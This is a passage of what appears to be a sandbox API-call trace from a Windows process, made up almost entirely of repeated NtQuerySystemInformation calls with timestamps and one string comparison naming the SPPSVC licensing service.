(SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.589] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ca30, Length=0x28, ResultLength=0x0) [0287.589] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.589] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.589] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ca30, Length=0x28, ResultLength=0x0) [0287.589] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.589] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.589] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207caa0, Length=0x28, ResultLength=0x0) [0287.589] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.589] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.590] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc00, Length=0x38, ResultLength=0x0) [0287.590] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.590] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb20, Length=0x28, ResultLength=0x0) [0287.592] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.592] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.592] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.592] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb20, Length=0x28, ResultLength=0x0) [0287.593] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c9c0, Length=0x20, ResultLength=0x0) [0287.593] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c940, Length=0x20, ResultLength=0x0) [0287.593] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.593] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c940, Length=0x20, ResultLength=0x0) [0287.667] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.667] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c940, Length=0x20, ResultLength=0x0) [0287.667] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.667] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.667] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.668] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.668] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.668] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc00, Length=0x38, ResultLength=0x0) [0287.668] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.668] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc00, Length=0x38, ResultLength=0x0) [0287.668] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ca80, Length=0x20, ResultLength=0x0) [0287.668] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ca10, Length=0x20, ResultLength=0x0) [0287.668] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.668] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.668] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.669] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ca10, Length=0x20, ResultLength=0x0) [0287.669] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.669] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.669] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.669] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.669] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.669] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.669] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.670] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d1c0, Length=0x20, ResultLength=0x0) [0287.670] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.670] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.670] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cf40, Length=0x50, ResultLength=0x0) [0287.671] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.671] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cf40, Length=0x50, ResultLength=0x0) [0287.671] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.688] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cf40, Length=0x50, ResultLength=0x0) [0287.688] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ce30, Length=0x50, ResultLength=0x0) [0287.688] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.688] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ce30, Length=0x50, ResultLength=0x0) [0287.688] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.688] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ce30, Length=0x50, ResultLength=0x0) [0287.688] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.689] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ce30, Length=0x50, ResultLength=0x0) [0287.689] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.689] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cd60, Length=0x38, ResultLength=0x0) [0287.691] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.691] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb90, Length=0x28, ResultLength=0x0) [0287.691] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.691] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.692] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb90, Length=0x28, ResultLength=0x0) [0287.692] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.692] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.692] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb90, Length=0x28, ResultLength=0x0) [0287.692] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.692] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.692] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc00, Length=0x28, ResultLength=0x0) [0287.692] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.692] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.692] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cd60, Length=0x38, ResultLength=0x0) [0287.693] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.693] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc80, Length=0x28, ResultLength=0x0) [0287.695] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.695] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.695] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.695] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.696] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.696] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.696] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc80, Length=0x28, ResultLength=0x0) [0287.696] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.696] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.696] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cd60, Length=0x38, ResultLength=0x0) [0287.696] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cbe0, Length=0x20, ResultLength=0x0) [0287.696] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb60, Length=0x20, ResultLength=0x0) [0287.696] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.696] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb60, Length=0x20, ResultLength=0x0) [0287.696] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.696] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb60, Length=0x20, ResultLength=0x0) [0287.697] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.697] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.697] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.697] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.697] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cd60, Length=0x38, ResultLength=0x0) [0287.697] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cbe0, Length=0x20, ResultLength=0x0) [0287.697] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb70, Length=0x20, ResultLength=0x0) [0287.697] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.697] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.697] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.697] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb70, Length=0x20, ResultLength=0x0) [0287.698] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.698] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.698] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.698] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.698] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.698] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.698] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.698] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cf40, Length=0x50, ResultLength=0x0) [0287.698] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.699] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cf40, Length=0x50, ResultLength=0x0) [0287.699] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.699] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cf40, Length=0x50, ResultLength=0x0) [0287.699] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ce30, Length=0x50, ResultLength=0x0) [0287.699] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.699] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ce30, Length=0x50, ResultLength=0x0) [0287.699] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.699] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ce30, Length=0x50, ResultLength=0x0) [0287.699] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.699] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ce30, Length=0x50, ResultLength=0x0) [0287.699] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.700] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cd60, Length=0x38, ResultLength=0x0) [0287.702] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.702] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb90, Length=0x28, ResultLength=0x0) [0287.703] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.703] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.703] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb90, Length=0x28, ResultLength=0x0) [0287.703] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.703] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.703] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb90, Length=0x28, ResultLength=0x0) [0287.703] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.703] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.703] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc00, Length=0x28, ResultLength=0x0) [0287.703] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.704] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.704] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cd60, Length=0x38, ResultLength=0x0) [0287.704] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.704] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc80, Length=0x28, ResultLength=0x0) [0287.706] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.706] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.707] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.707] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.707] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.707] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.707] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc80, Length=0x28, ResultLength=0x0) [0287.707] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.707] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.708] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cd60, Length=0x38, ResultLength=0x0) [0287.708] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cbe0, Length=0x20, ResultLength=0x0) [0287.708] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb60, Length=0x20, ResultLength=0x0) [0287.708] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.708] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb60, Length=0x20, ResultLength=0x0) [0287.708] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.708] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb60, Length=0x20, ResultLength=0x0) [0287.708] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.708] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.708] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.709] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.709] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cd60, Length=0x38, ResultLength=0x0) [0287.709] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cbe0, Length=0x20, ResultLength=0x0) [0287.709] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb70, Length=0x20, ResultLength=0x0) [0287.709] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.709] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.709] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.709] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb70, Length=0x20, ResultLength=0x0) [0287.709] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.710] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.710] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.710] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.710] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.710] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.710] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.710] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cff0, Length=0x50, ResultLength=0x0) [0287.710] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cf70, Length=0x28, ResultLength=0x0) [0287.710] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0287.710] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.710] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.710] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cff0, Length=0x50, ResultLength=0x0) [0287.711] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.711] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cff0, Length=0x50, ResultLength=0x0) [0287.711] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.711] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cff0, Length=0x50, ResultLength=0x0) [0287.711] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.711] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cf20, Length=0x38, ResultLength=0x0) [0287.716] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.716] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cd50, Length=0x28, ResultLength=0x0) [0287.716] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.716] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.716] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cd50, Length=0x28, ResultLength=0x0) [0287.717] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.717] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.717] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cd50, Length=0x28, ResultLength=0x0) [0287.717] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.718] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.720] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cdc0, Length=0x28, ResultLength=0x0) [0287.720] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.720] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.720] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cf20, Length=0x38, ResultLength=0x0) [0287.720] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.720] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ce40, Length=0x28, ResultLength=0x0) [0287.725] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.725] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.725] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.726] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.726] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.726] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.726] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ce40, Length=0x28, ResultLength=0x0) [0287.726] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cce0, Length=0x20, ResultLength=0x0) [0287.726] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc60, Length=0x20, ResultLength=0x0) [0287.726] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.727] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc60, Length=0x20, ResultLength=0x0) [0287.727] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.727] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc60, Length=0x20, ResultLength=0x0) [0287.727] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.727] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.727] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.727] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.727] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.728] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cf20, Length=0x38, ResultLength=0x0) [0287.728] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.728] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cf20, Length=0x38, ResultLength=0x0) [0287.728] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cda0, Length=0x20, ResultLength=0x0) [0287.728] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cd30, Length=0x20, ResultLength=0x0) [0287.728] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.728] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.729] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.729] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cd30, Length=0x20, ResultLength=0x0) [0287.729] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.729] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.729] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.729] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.729] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.729] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.736] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d120, Length=0x40, ResultLength=0x0) [0287.737] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.737] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.738] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d080, Length=0x40, ResultLength=0x0) [0287.738] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.738] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d080, Length=0x40, ResultLength=0x0) [0287.738] NtQuerySystemInformation 